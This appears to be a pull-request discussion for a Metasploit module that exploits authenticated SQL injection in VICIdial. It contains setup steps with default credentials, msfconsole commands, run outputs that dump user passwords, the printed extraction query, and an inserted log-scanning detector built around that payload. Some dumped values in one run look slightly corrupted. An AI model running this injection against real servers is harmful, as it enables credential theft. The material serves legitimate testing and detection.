VICIdial Multiple SQLi (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878) #16732
Drafted because this is a placeholder and not ready for review.
Setting up this software was.... an exercise in frustration. I know I kept step by step notes and module docs, but I can't seem to find them. I'm going to take a little time to find it again before making this ready for review.
Maybe this will help: Also, GOautodial and VICIbox are available as an ISO and come with VICIdial installed by default. This makes testing much easier. Also, it would be worth testing the module on VICIbox and GOautodial anyway, as this is probably one of the most common methods of VICIdial deployment [citation needed].
Hey @h00die, thanks for the contribution. Just wondering if you have any update on this? No worries if not. I might spin up one of the ISOs bcoles mentioned and give it a test if you think it's almost ready.
I don't, been busy with life and prioritizing the VMware post module work over my own module stuff. If you want to try, go for it! If not it's ok to sit here another week or two so I can get VMware buttoned up and then write this up.
No worries at all @h00die, just checking in. I gave it a test and put together some documentation. I tried pushing up the changes to a PR on your fork but got a permissions denied error - I was likely doing something incorrectly, my apologies, so it's just included below.
During testing 2 of the 5 actions were failing while testing against ViciBox_v9. I'll investigate a bit further today:
List Users - access_recordings method working
List Users - agent_time_sheet method Testing of SQLi failed.
List Users - agentcall_email method working
List Users - modify_email_accounts method working
List Users - user_stats method Testing of SQLi failed.
This module exploits several authenticated SQL injection vulnerabilities in VICIdial 2.14b0.5 prior to svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).
Vulnerable Application
- Install the following OpenSUSE 10 ISO: ViciBox_v9.x86_64-9.0.3.iso
- Change the default password
- Set Timezone, Keyboard Layout and Language
- Network settings should autoconfigure (Tested on VMware Fusion). Network settings can be configured with the command `yast lan` if necessary
- Run `vicibox-express` to initiate the ViciDial Express Installation; everything can be kept as default
- Navigate to `http://<ip-address>/`
- Click Administration and login with the default credentials username: 6666, password: 1234
- Once logged in, click "Finish setup". Everything can be kept as default.
- Click
- The complete list of setup instructions can be found by following this link
Verification Steps
- Start msfconsole
- Do: `use auxiliary/scanner/http/vicidial_multiple_sqli`
- Do: `set username <username>`
- Do: `set password <password>`
- Do: `show actions`
- Select from the list or keep the default
- Do: `run`
- The module will exploit the selected SQL injection and return the extracted usernames and passwords
Scenarios
ViciBox_v9.x86_64-9.0.3 using the List Users - modify_email_accounts method:
msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
password => notpassword
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
action => List Users - modify_email_accounts method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[*] {SQLi} Executing (select group_concat(TXMlUAF) from (select cast(concat_ws(';',ifnull(user,''),ifnull(pass,'')) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
[*] {SQLi} Encoded to (select group_concat(TXMlUAF) from (select cast(concat_ws(0x3b,ifnull(user,repeat(0x87,0)),ifnull(pass,repeat(0x52,0))) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
[*] {SQLi} Time-based injection: expecting output of length 46
[!] No active DB -- Credential data will not be saved!
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedit
VDCL donotedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
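A detection-side example added here, not part of the PR or of the module: it parses constructed Common Log Format lines and flags requests whose decoded query string carries the extraction-style SQL fragment the verbose output above prints (group_concat over a subselect with hex-encoded string literals). The request path and parameter name are placeholders, and the log lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures of extraction-style SQL fragments, modelled on the query the module
# prints in verbose mode above (string literals hex-encoded, so no quotes needed).
INDICATORS = {
    "group_concat": re.compile(r"group_concat\s*\(", re.I),
    "concat_ws_hex_literal": re.compile(r"concat_ws\s*\(\s*0x[0-9a-f]+", re.I),
    "repeat_hex_zero": re.compile(r"repeat\s*\(\s*0x[0-9a-f]+\s*,\s*0\s*\)", re.I),
    "cast_as_binary": re.compile(r"cast\s*\(.+?\bas\s+binary\s*\)", re.I | re.S),
}

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def parse_access_log(line):
    # Split one CLF line into fields; the query string is URL-decoded so that
    # %xx and + encodings cannot hide the signatures from the regexes.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"], rec["query"] = path, unquote_plus(query)
    return rec

def match_indicators(text):
    # Names of every indicator that fires on the decoded query string, in dict order.
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_lines(lines):
    # One finding per request whose decoded query matches any indicator.
    findings = []
    for line in lines:
        rec = parse_access_log(line)
        if rec is None:
            continue
        hits = match_indicators(rec["query"])
        if hits:
            findings.append({"ip": rec["ip"], "path": rec["path"], "indicators": hits})
    return findings

# Constructed sample lines: path and parameter name are placeholders; the SQL
# fragment in the first line is the one the module printed in the output above.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jan/2022:10:00:00 +0000] "GET /vicidial/PLACEHOLDER_PAGE.php?user=6666&p=(select+group_concat(TXMlUAF)+from+(select+cast(concat_ws(0x3b,ifnull(user,repeat(0x87,0)),ifnull(pass,repeat(0x52,0)))+as+binary)+TXMlUAF+from+vicidial_users+limit+3)+jUFFwQn) HTTP/1.1" 200 512',
    '10.0.0.7 - - [20/Jan/2022:10:01:00 +0000] "GET /vicidial/PLACEHOLDER_PAGE.php?user=6666&stage=list&limit=3 HTTP/1.1" 200 1024',
]
```

Because the module runs this extraction as a time-based blind injection, the on-the-wire requests may carry only conditional fragments rather than the full query, so treat these signatures as one input to detection rather than the whole of it.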
Thanks for mentioning this bcoles. @h00die for transparency I installed and setup GOautodial and the module as it's written is unable to authenticate with the application. The login URIs and authentication requirements are a bit different. Edit: Not sure if you'll want to investigate this further. If you do, when installing GOautodial this link is useful. If not, outlining what this module has been tested on and what it is intended to work on might be sufficient.
Not surprising about GOautodial using a different URL structure. My schedule is freeing up, hoping to restart this and get it finished soon. I used ViciBox_v10.x86_64-10.0.0.iso, not 9, so that may account for some of the modules not working as new features may have been added. When I work on the doc, I'll do 9 and 10 at the same time.
vicidial sqli module first run of docs updates to vicidial
I think I remember vicidial being a pain because I was testing each page and API endpoint. The exploitable ones in here actually required little to nothing to setup and exploit.
Tested against 9.0.3 and 10.0.0, added docs, ready for real review! Also did a rebase.
ping @jheysel-r7 just wanted to check if you'd have time to get back around to this one
Thanks @h00die! Great module. Tested and everything looks good. I ran `ruby tools/dev/msftidy_docs.rb documentation/modules/auxiliary/scanner/http/vicidial_multiple_sqli.md` and made a couple of minor suggestions based on the output.
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - access_recordings method
action => List Users - access_recordings method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedit
VDCL donotedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agent_time_sheet method
action => List Users - agent_time_sheet method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedit
VDCL donotedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agentcall_email method
action => List Users - agentcall_email method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedit
VDCL donotedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
action => List Users - modify_email_accounts method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedht
VDCL donoDedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - user_stats method
action => List Users - user_stats method
msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
vicidial_users
==============
user pass
---- ----
6666 notpassword
VDAD donotedit
VDCL donotedit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
addressed the comments, retested on my side, should be good to ship!
Release Notes: This PR adds a module which exploits several authenticated sqli in VICIdial (CVE-2022-34876, CVE-2022-34877, CVE-2022-34878)
This PR adds a module which exploits several authenticated sqli in VICIdial. Of note, two of the modules require a permissions change (vicibox sets admin permissions to near nothing, other than the ability to change permissions).
Verification
- msfconsole
- `use auxiliary/scanner/http/vicidial_multiple_sqli`
- set rhosts and password
- `run`